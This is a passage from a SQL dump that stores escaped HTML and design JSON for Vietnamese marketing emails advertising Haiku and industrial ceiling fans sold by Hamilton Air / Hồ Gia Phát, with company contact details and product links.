break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503713719-home_haiku.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:19px 33px 40px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-family: \'Source Sans Pro\',sans-serif; font-size: 28px; font-weight: 700; color: #236fa1; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px; font-family: \'Source Sans Pro\', sans-serif;\\\">Kh\\u00f4ng Ch\\u1ec9 L\\u00e0 M\\u00e1t - M\\u00e0 C\\u00f2n H\\u01a1n Th\\u1ebf N\\u1eefa<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n  \\r\\n  \\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #272362;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #272362;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:23px 40px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #b8b8b8; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\">-------o0o------<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u2198\\ufe0f Office &amp; Showroom: 304 Tr\\u01b0\\u01a1ng V\\u0103n Bang, Th\\u1ea1nh M\\u1ef9 L\\u1ee3i, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp H\\u1ed3 Ch\\u00ed Minh.<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\ud83d\\udc8c Email: sale@hogiaphat.vn<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u260e\\ufe0f T\\u01b0 v\\u1ea5n B\\u00e1n H\\u00e0ng: 0913 123860<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\ud83d\\udcde Hotline: 028 730 333 69<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u00a0<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u00a0\\u25b9\\u25b9\\u25b9Tổ chức đào tạo WIT\\/H\\u1ed3 Gia Ph\\u00e1t \\u25b9\\u25b9\\u25b9<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u2705 Mang \\u0111\\u1ebfn gi\\u1ea3i ph\\u00e1p qu\\u1ea1t l\\u00e0m m\\u00e1t ti\\u1ec7n nghi &amp; tr\\u1ea3i nghi\\u1ec7m t\\u1ed1t h\\u01a1n cho gia \\u0111\\u00ecnh nh\\u00e0 \\u1edf ho\\u1eb7c doanh nghi\\u1ec7p c\\u1ee7a b\\u1ea1n<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u2622\\ufe0f D\\u00e0nh cho nh\\u00e0 x\\u01b0\\u1edfng, c\\u00f4ng nghi\\u1ec7p, v\\u0103n ph\\u00f2ng th\\u01b0\\u01a1ng m\\u1ea1i, nh\\u00e0 \\u1edf cao c\\u1ea5p.<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\u267b\\ufe0f\\u00a0 S\\u1ef1 quan t\\u00e2m c\\u1ee7a ch\\u00fang t\\u00f4i l\\u00e0 s\\u1eed d\\u1ee5ng n\\u0103ng l\\u01b0\\u1ee3ng hi\\u1ec7u qu\\u1ea3.\\u00a0<\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\ud83c\\udf10 <a href=\\\"https:\\/\\/www.bigfans.vn\\\">https:\\/\\/www.bigfans.vn<\\/a><\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">\\ud83c\\udf10 <a href=\\\"https:\\/\\/quattran.co\\\">https:\\/\\/quattran.co<\\/a><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:19px 19px 0px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"91%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 1px solid #616888;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 40px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"font-size: 14px; color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 12px; line-height: 16.8px;\\\">\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 12px; line-height: 16.8px;\\\">C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/span><\\/p>\\r\\n<p style=\\\"font-size: 14px; line-height: 140%;\\\"><a rel=\\\"noopener\\\" href=\\\"%unsubscribe_url%\\\" target=\\\"_blank\\\"><span style=\\\"font-size: 12px; line-height: 16.8px;\\\">Hu\\u1ef7 \\u0111\\u0103ng k\\u00fd\\u00a0<\\/span><\\/a><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n  <\\/div>\\r\\n  \\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"');
INSERT INTO `tblma_emails` (`id`, `name`, `type`, `category`, `segment`, `published`, `language`, `description`, `addedfrom`, `dateadded`, `color`, `subject`, `email_template`, `from_name`, `from_address`, `reply_to_address`, `bcc_address`, `attachment`, `data_design`, `data_html`) VALUES
(7, '[Tổ chức đào tạo WIT] - Cung cấp giải pháp toàn diện quạt làm mát cho không gian nhà ở/Văn Phòng & Nhà Xưởng', '', 9, 0, 1, 'vietnamese', '', 1, '2023-03-14 14:50:49', '', '[Tổ chức đào tạo WIT] - Cung cấp giải pháp toàn diện quạt làm mát cho không gian nhà ở/Văn Phòng & Nhà Xưởng', 14, 'WIT', 'no-reply@hogiaphat.vn', 'sale@hogiaphat.vn', 'cskh@hogiaphat.vn', '', '\"{\\\"counters\\\":{\\\"u_row\\\":25,\\\"u_column\\\":36,\\\"u_content_menu\\\":2,\\\"u_content_text\\\":38,\\\"u_content_image\\\":16,\\\"u_content_timer\\\":1,\\\"u_content_button\\\":16,\\\"u_content_social\\\":2,\\\"u_content_divider\\\":7,\\\"u_content_text_deprecated\\\":20,\\\"u_content_heading\\\":4},\\\"body\\\":{\\\"id\\\":\\\"GV18HJ58oe\\\",\\\"rows\\\":[{\\\"id\\\":\\\"-j-7JbtKQX\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"8mzvqBlV3y\\\",\\\"contents\\\":[{\\\"id\\\":\\\"4mcWZHmjh6\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"20px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678765403006-LOGO.png\\\",\\\"width\\\":2256,\\\"height\\\":296},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#111416\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"S5aKfBqVYk\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"_n240XDaNA\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Mkpj_fE_gW\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"5px 0px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678765991818-Haiku-I.jpg\\\",\\\"width\\\":600,\\\"height\\\":452},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_2\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"qQIDckHbBm\\\",\\\"contents\\\":[{\\\"id\\\":\\\"jg_Z79Uyn_\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"5px 10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#f1c40f\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">HAIKU - Qu\\u1ea1t tr\\u1ea7n cao c\\u1ea5p \\u0111\\u01b0\\u1ee3c thi\\u1ebft k\\u1ebf v\\u00e0 s\\u1ea3n xu\\u1ea5t t\\u1ea1i Hoa K\\u1ef3.<\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"XwSLnWhGTN\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 18px; line-height: 25.2px;\\\\\\\"><strong>QU\\u1ea0T TR\\u1ea6N TH\\u00d4NG MINH<\\/strong><\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"RayghVoigS\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 30px 40px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ced4d9\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">V\\u1edbi ch\\u1ebf \\u0111\\u1ed9 Haiku Fan-Eco mang l\\u1ea1i hi\\u1ec7u qu\\u1ea3 h\\u00e0ng \\u0111\\u1ea7u th\\u1ebf gi\\u1edbi nh\\u1edd s\\u1ef1 ti\\u1ec7n l\\u1ee3i c\\u1ee7a thi\\u1ebft b\\u1ecb di \\u0111\\u1ed9ng c\\u1ee7a b\\u1ea1n. Fan Eco mang \\u0111\\u1ebfn kh\\u1ea3 n\\u0103ng ti\\u1ebft ki\\u1ec7m n\\u0103ng l\\u01b0\\u1ee3ng ch\\u01b0a t\\u1eebng c\\u00f3 v\\u1edbi lu\\u1ed3ng kh\\u00f4ng kh\\u00ed l\\u00e0m m\\u00e1t h\\u00e0i h\\u00f2a v\\u00e0 ho\\u00e0n h\\u1ea3o.<\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"IRQURjJVkF\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#db1908\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"8px 25px 8px 24px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM TH\\u00caM<\\/span>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":120,\\\"calculatedHeight\\\":33}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#111416\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"_PZZhYOQZ7\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"yOpq-jE4C5\\\",\\\"contents\\\":[{\\\"id\\\":\\\"2yWUSplc9A\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678768028416-haiku-bg_optimized.png\\\",\\\"width\\\":1200,\\\"height\\\":593},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_14\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_32\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#111416\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_23\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"9XGuynNlFn\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"KiUtUTiorY\\\",\\\"contents\\\":[{\\\"id\\\":\\\"nFHzevz2Ys\\\",\\\"type\\\":\\\"menu\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"menu\\\":{\\\"items\\\":[{\\\"key\\\":\\\"1603383850591\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"},\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/\\\",\\\"target\\\":\\\"_self\\\"}},\\\"text\\\":\\\"HOME\\\"},{\\\"key\\\":\\\"1603383858336\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"},\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/giam-gia\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"text\\\":\\\"\\u0110ANG SALE OFF\\\"},{\\\"key\\\":\\\"1603383867301\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"},\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-canh-go\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"text\\\":\\\"QU\\u1ea0T TR\\u1ea6N C\\u00c1NH G\\u1ed6\\\"},{\\\"key\\\":\\\"1603383872391\\\",\\\"link\\\":{\\\"name\\\":\\\"web\\\",\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"},\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-cong-nghiep\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"text\\\":\\\"QU\\u1ea0T TR\\u1ea6N HVLS\\\"}]},\\\"fontFamily\\\":{\\\"label\\\":\\\"Arial\\\",\\\"value\\\":\\\"arial,helvetica,sans-serif\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textColor\\\":\\\"#ffffff\\\",\\\"linkColor\\\":\\\"#0068A5\\\",\\\"align\\\":\\\"center\\\",\\\"layout\\\":\\\"horizontal\\\",\\\"separator\\\":\\\"|\\\",\\\"padding\\\":\\\"5px 